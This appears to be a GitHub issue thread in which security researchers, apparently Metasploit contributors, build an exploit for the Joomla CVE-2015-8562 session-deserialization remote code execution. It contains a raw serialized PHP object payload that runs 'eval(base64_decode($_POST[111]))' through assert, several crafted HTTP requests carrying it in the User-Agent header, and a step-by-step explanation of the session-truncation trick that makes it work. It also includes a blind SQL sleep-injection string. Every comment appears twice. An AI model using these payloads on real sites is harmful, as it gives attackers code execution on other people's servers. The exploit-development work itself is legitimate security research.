[Request] Critical 0day RCE in Joomla (CVE-2015-8562)

[madmike33]

@jvoisin r u interested mate

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

[wvu-r7]

Thank you, @madmike33. Looks much better, lol.

[wvu-r7]

Thank you, @madmike33. Looks much better, lol.

[madmike33]

Agree 😁

[madmike33]

Agree 😁

[madmike33]

@wvu-r7 how about some labels

[madmike33]

@wvu-r7 how about some labels

[FireFart]

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

[FireFart]

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

[FireFart]

This seems to be the payload:

https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L83
__destruct calls disconnect which calls call_user_func_array: https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L206

[FireFart]

This seems to be the payload:

https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L83
__destruct calls disconnect which calls call_user_func_array: https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L206

[wvu-r7]

@brandonprry ^

[wvu-r7]

@brandonprry ^

[madmike33]

@FireFart tu,interesting its alla bout uploading the payload in the tokens,if iam not wrong

[madmike33]

@FireFart tu,interesting its alla bout uploading the payload in the tokens,if iam not wrong

[FireFart]

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

[FireFart]

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

[brandonprry]

I am very close, give me an hour or so.

[brandonprry]

I am very close, give me an hour or so.

[madmike33]

@brandonprry waiting to be the firsr one to test it :)

[madmike33]

@brandonprry waiting to be the firsr one to test it :)

[FireFart]

@brandonprry great! i need to get some sleep will check it tomorrow morning in about 6 hours

[FireFart]

@brandonprry great! i need to get some sleep will check it tomorrow morning in about 6 hours

[brandonprry]

It takes two requests;

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. It is obvious the intent, but something seems to be missing...

[brandonprry]

It takes two requests;

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. It is obvious the intent, but something seems to be missing...

[brandonprry]

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

[brandonprry]

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

[kendyhikaru]

@brandonprry wait your info.

[kendyhikaru]

@brandonprry wait your info.

[brandonprry]

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

[brandonprry]

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

[brandonprry]

They are not related.

EDIT: I might have spoken too soon.

[brandonprry]

They are not related.

EDIT: I might have spoken too soon.

[FireFart]

@brandonprry so exactly how far I got :(

[FireFart]

@brandonprry so exactly how far I got :(

[wvu-r7]

I poked at this on my own... and got equally as far, lol.

[wvu-r7]

I poked at this on my own... and got equally as far, lol.

[wvu-r7]

Think I got it.

[wvu-r7]

Think I got it.

[FireFart]

so it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

[FireFart]

so it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

[wvu-r7]

Gonna put together a PoC... hope it's not a fluke!

[wvu-r7]

Gonna put together a PoC... hope it's not a fluke!

[FireFart]

@wvu-r7 👯 so send it over for testing :D

[FireFart]

@wvu-r7 👯 so send it over for testing :D

[wvu-r7]

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

[wvu-r7]

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

[madmike33]

So anything new so far guys,the thing is in the payload according to sucuri they modified the payload, @wchen-r7 any idea from ur side too?

[madmike33]

So anything new so far guys,the thing is in the payload according to sucuri they modified the payload, @wchen-r7 any idea from ur side too?

[wvu-r7]

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

[wvu-r7]

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

[icehteam]

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

[icehteam]

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

[FireFart]

jeah but we haven't found it so far

[FireFart]

jeah but we haven't found it so far

[evi1m0]

We need to find it. :<

[evi1m0]

We need to find it. :<

[madmike33]

Sth Weird i set my User-Agent as
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
first time it worked, after than when i retried i just got 500 error, i wonder if it has to do sth with overwriting sessions :/ @brandonprry @FireFart @wvu-r7 btw i modified it a little have a look at it

[madmike33]

Sth Weird i set my User-Agent as
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
first time it worked, after than when i retried i just got 500 error, i wonder if it has to do sth with overwriting sessions :/ @brandonprry @FireFart @wvu-r7 btw i modified it a little have a look at it

[icehteam]

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

[icehteam]

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

[madmike33]

@icehteam give it a try on ur side with the payload i have mentioned up using base64 and let me know ur result

[madmike33]

@icehteam give it a try on ur side with the payload i have mentioned up using base64 and let me know ur result

[mmetince]

@brandonprry You User-Agent has to be start or end with double quote in order to do string escaping at serialized string. Also you payload has to end with some special characters that latin-1 does NOT support like ð .

For example :
User-Agent : TEST

Serialized string is :

 __default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169533;s:18:"session.timer.last";i:1450169533;s:17:"session.timer.now";i:1450169533;s:22:"session.client.browser";s:4:"TEST";s:8:"registry";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":26:{s:9:"\0\0\0isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:1:"9";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:12:"requireReset";N;s:10:"\0\0\0_params";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGroups";a:2:{i:0;i:1;i:1;i:9;}s:14:"\0\0\0_authLevels";a:3:{i:0;i:1;i:1;i:1;i:2;i:5;}s:15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg";N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;}s:16:"com_mailto.links";a:4:{s:40:"864263691cf020260fd769f9e91b5152c4a0e278";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/3-welcome-to-your-blog";s:6:"expiry";i:1450169533;}s:40:"a7425dbaaa274c9c71da73ebdfc40ed0e1941365";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/4-about-your-home-page";s:6:"expiry";i:1450169533;}s:40:"50717150dd908262db5e49b4334dcc7f2d3bd0dd";O:8:"stdClass":2:{s:4:"link";s:47:"http://127.0.0.1:8181/index.php/6-your-template";s:6:"expiry";i:1450169533;}s:40:"78e8cf066aacebaecd359c665129e4281e269205";O:8:"stdClass":2:{s:4:"link";s:46:"http://127.0.0.1:8181/index.php/5-your-modules";s:6:"expiry";i:1450169533;}}}

Please look at where TEST is located.

User-Agent is : TESTð (ending with none valid character for latin-1)
Serialized string is:

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169650;s:18:"session.timer.last";i:1450169650;s:17:"session.timer.now";i:1450169650;s:22:"session.client.browser";s:5:"TEST

As you can see, rest of the serialized string is omitted! because of MySQL behavior ( it remind one of the Wordpress stored XSS. ) That is the our entry point. Also as I said before our payload need to end/start with double quote in order to do another trick which is escaping!

User Agent is : TEST"}ð

Serialized string is :

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169799;s:18:"session.timer.last";i:1450169799;s:17:"session.timer.now";i:1450169799;s:22:"session.client.browser";s:6:"TEST"}

We managed to define __default array with valid syntax. Then we are free to define our serialized object that carry payload through MySQLDriver class.

[mmetince]

@brandonprry You User-Agent has to be start or end with double quote in order to do string escaping at serialized string. Also you payload has to end with some special characters that latin-1 does NOT support like ð .

For example :
User-Agent : TEST

Serialized string is :

 __default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169533;s:18:"session.timer.last";i:1450169533;s:17:"session.timer.now";i:1450169533;s:22:"session.client.browser";s:4:"TEST";s:8:"registry";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":26:{s:9:"\0\0\0isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:1:"9";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:12:"requireReset";N;s:10:"\0\0\0_params";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGroups";a:2:{i:0;i:1;i:1;i:9;}s:14:"\0\0\0_authLevels";a:3:{i:0;i:1;i:1;i:1;i:2;i:5;}s:15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg";N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;}s:16:"com_mailto.links";a:4:{s:40:"864263691cf020260fd769f9e91b5152c4a0e278";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/3-welcome-to-your-blog";s:6:"expiry";i:1450169533;}s:40:"a7425dbaaa274c9c71da73ebdfc40ed0e1941365";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/4-about-your-home-page";s:6:"expiry";i:1450169533;}s:40:"50717150dd908262db5e49b4334dcc7f2d3bd0dd";O:8:"stdClass":2:{s:4:"link";s:47:"http://127.0.0.1:8181/index.php/6-your-template";s:6:"expiry";i:1450169533;}s:40:"78e8cf066aacebaecd359c665129e4281e269205";O:8:"stdClass":2:{s:4:"link";s:46:"http://127.0.0.1:8181/index.php/5-your-modules";s:6:"expiry";i:1450169533;}}}

Please look at where TEST is located.

User-Agent is : TESTð (ending with none valid character for latin-1)
Serialized string is:

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169650;s:18:"session.timer.last";i:1450169650;s:17:"session.timer.now";i:1450169650;s:22:"session.client.browser";s:5:"TEST

As you can see, rest of the serialized string is omitted! because of MySQL behavior ( it remind one of the Wordpress stored XSS. ) That is the our entry point. Also as I said before our payload need to end/start with double quote in order to do another trick which is escaping!

User Agent is : TEST"}ð

Serialized string is :

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169799;s:18:"session.timer.last";i:1450169799;s:17:"session.timer.now";i:1450169799;s:22:"session.client.browser";s:6:"TEST"}

We managed to define __default array with valid syntax. Then we are free to define our serialized object that carry payload through MySQLDriver class.

[madmike33]

@mmetince Guzel arkadash :) i think he has a point :)

[madmike33]

@mmetince Guzel arkadash :) i think he has a point :)

[evi1m0]

@madmike33 @brandonprry

[evi1m0]

@madmike33 @brandonprry

[icehteam]

@evi1m0 congrats that you have found.

[icehteam]

@evi1m0 congrats that you have found.

[shargon]

this code produce insert in session table... but the code dont execute ...

GET http://xxxxxxxxxxxx/index.php?lang=es HTTP/1.1
Host: xxxxxx
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}
Accept-Language: es-ES,es;q=0.8
Cookie: _ga=GA1.2.643008714.1450174140; 4129bbefb84766bd976b50022b1d5584=dsviufiujk25e1eoug2fuktln6; 5a63016b8228e8842a075e3be3ccdab8=es-ES

in table got this ... (field data)

'__default|a:7:{s:15:"session.counter";i:2;s:19:"session.timer.start";i:1450185484;s:18:"session.timer.last";i:1450185484;s:17:"session.timer.now";i:1450185497;s:22:"session.client.browser";s:396:"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}";s:8:"registry";O:9:"JRegistry":1:{s:7:"

i still working ...

[shargon]

this code produce insert in session table... but the code dont execute ...

GET http://xxxxxxxxxxxx/index.php?lang=es HTTP/1.1
Host: xxxxxx
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}
Accept-Language: es-ES,es;q=0.8
Cookie: _ga=GA1.2.643008714.1450174140; 4129bbefb84766bd976b50022b1d5584=dsviufiujk25e1eoug2fuktln6; 5a63016b8228e8842a075e3be3ccdab8=es-ES

in table got this ... (field data)

'__default|a:7:{s:15:"session.counter";i:2;s:19:"session.timer.start";i:1450185484;s:18:"session.timer.last";i:1450185484;s:17:"session.timer.now";i:1450185497;s:22:"session.client.browser";s:396:"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}";s:8:"registry";O:9:"JRegistry":1:{s:7:"

i still working ...

[madmike33]

@shargon tu for the clarification i wanted to see if its only me getting untill here ;) i know where to look now :)

[madmike33]

@shargon tu for the clarification i wanted to see if its only me getting untill here ;) i know where to look now :)

[allyshka]

@shargon Problem in size of serialized data. In your example: s:396:"}__test|O:21:"JDatabaseDriverMysqli

If you use payload like this: ";}__ wrong size of string variable call error during unserialize process.
If size is correct, then exploit is successfull.

Question is - how to get correct size.

[allyshka]

@shargon Problem in size of serialized data. In your example: s:396:"}__test|O:21:"JDatabaseDriverMysqli

If you use payload like this: ";}__ wrong size of string variable call error during unserialize process.
If size is correct, then exploit is successfull.

Question is - how to get correct size.

[shargon]

@allyshka i can insert inside the fist __default like this ...

UserAgent: TEST" CODE HERE }ð

and result in session table (data field) is:

'__default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450187208;s:18:"session.timer.last";i:1450187208;s:17:"session.timer.now";i:1450187208;s:22:"session.client.browser";s:19:"TEST" CODE HERE }ð";s:8:"registry";O:9:"JRegistry":1:{s:7:"

but yes, size is 19 ...

[shargon]

@allyshka i can insert inside the fist __default like this ...

UserAgent: TEST" CODE HERE }ð

and result in session table (data field) is:

'__default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450187208;s:18:"session.timer.last";i:1450187208;s:17:"session.timer.now";i:1450187208;s:22:"session.client.browser";s:19:"TEST" CODE HERE }ð";s:8:"registry";O:9:"JRegistry":1:{s:7:"

but yes, size is 19 ...

[shargon]

i think the exploit is like this ... dummy";s:xxx:"EXPLOIT" }\0ð

[shargon]

i think the exploit is like this ... dummy";s:xxx:"EXPLOIT" }\0ð

[cyadron]

Getting data in the DB is solved. But we must find a magic method to also get the data out (execute the object).

[cyadron]

Getting data in the DB is solved. But we must find a magic method to also get the data out (execute the object).

[madmike33]

@cyadron sth like this ? AND (SELECT * FROM (SELECT(SLEEP(5)))TEST) AND (3432=3432

[madmike33]

@cyadron sth like this ? AND (SELECT * FROM (SELECT(SLEEP(5)))TEST) AND (3432=3432

[shargon]

@madmike33 ... this is a sql ... it has nothing to do with the subject

[shargon]

@madmike33 ... this is a sql ... it has nothing to do with the subject

[madmike33]

@shargon i know that it is SQL however how are u planning on calling it except with an sql query ? BTW this is just an example

[madmike33]

@shargon i know that it is SQL however how are u planning on calling it except with an sql query ? BTW this is just an example

[shargon]

@madmike33

This exploits run like this

First, insert the payload in the session table ( in the correct way )

Then, the next call to the server, the session is deserialized, and execute the php payload

Sorry for my bad english

[shargon]

@madmike33

This exploits run like this

First, insert the payload in the session table ( in the correct way )

Then, the next call to the server, the session is deserialized, and execute the php payload

Sorry for my bad english

[icehteam]

Anybody with good knowledge of OOP's can execute this , I'm still trying.. anyone using skype..??
add me base64_decode('bXIuY2h1cmNobDMzdA=='); lol

[icehteam]

Anybody with good knowledge of OOP's can execute this , I'm still trying.. anyone using skype..??
add me base64_decode('bXIuY2h1cmNobDMzdA=='); lol

[madmike33]

ye its a good idea we can make a group and evryone give his idea in skype @icehteam

[madmike33]

ye its a good idea we can make a group and evryone give his idea in skype @icehteam

[cyadron]

@shargon Do you mean that the next time you reload that page, session info is read from the databse and deserialized and the object is executed?

[cyadron]

@shargon Do you mean that the next time you reload that page, session info is read from the databse and deserialized and the object is executed?

[shargon]

@cyadron yes,i thought is like this, for run the exploit, Its necessary make 2 calls, one per poison, two per execution

The execution part its simple, joomla deserialize the session and run the poison...

The hard work its do the correct payload for exploit it

[shargon]

@cyadron yes,i thought is like this, for run the exploit, Its necessary make 2 calls, one per poison, two per execution

The execution part its simple, joomla deserialize the session and run the poison...

The hard work its do the correct payload for exploit it

[madmike33]

yes what @cyadron said is true we need to cals also as @brandonprry perry stated earlier

[madmike33]

yes what @cyadron said is true we need to cals also as @brandonprry perry stated earlier

[FireFart]

guys please use IRC or Skype for discussing this exploit this issue is getting too big and too offtopic

[FireFart]

guys please use IRC or Skype for discussing this exploit this issue is getting too big and too offtopic

[icehteam]

My skype is base64_decode('bXIuY2h1cmNobDMzdA=='); , Let me know urs folks.

[icehteam]

My skype is base64_decode('bXIuY2h1cmNobDMzdA=='); , Let me know urs folks.

[shargon]

http://www.freebuf.com/vuls/89754.html <- Solved

[shargon]

http://www.freebuf.com/vuls/89754.html <- Solved

[madmike33]

👍 @shargon

[madmike33]

👍 @shargon

[cyadron]

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

[cyadron]

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

[borismattijssen]

edit:
decided to remove the screenshot as I just posted it out of excitement not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

[borismattijssen]

edit:
decided to remove the screenshot as I just posted it out of excitement not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

[jstnkndy]

@borismattijssen What's the purpose of posting a screenshot but no technical details?

[jstnkndy]

@borismattijssen What's the purpose of posting a screenshot but no technical details?

[borismattijssen]

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

[borismattijssen]

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

[FireFart]

lol

[FireFart]

lol

[jstnkndy]

so the screenshot is just.... bragging?

[jstnkndy]

so the screenshot is just.... bragging?

[borismattijssen]

just showing it isn't that hard..

[borismattijssen]

just showing it isn't that hard..

[falconz]

@borismattijssen I see vulnerable in user agent or xfowarder, why do you hidden URI?

[falconz]

@borismattijssen I see vulnerable in user agent or xfowarder, why do you hidden URI?

[deftskiddie]

@falconz my guess, it is not a private address lol

[deftskiddie]

@falconz my guess, it is not a private address lol

[FireFart]

closing this because the details are public available and a module is also ready

[FireFart]

closing this because the details are public available and a module is also ready

[wchen-r7]

@FireFart In your commit, I recommend just do Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

[wchen-r7]

@FireFart In your commit, I recommend just do Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

[wvu-r7]

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

[wvu-r7]

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

[GHOST07v]

Does not work with me...

[GHOST07v]

Does not work with me...

[ggg4566]

Does not work to version below 3.x , need find other trick

[ggg4566]

Does not work to version below 3.x , need find other trick

[bgeesaman]

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

[bgeesaman]

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

[JohnMartinelli]

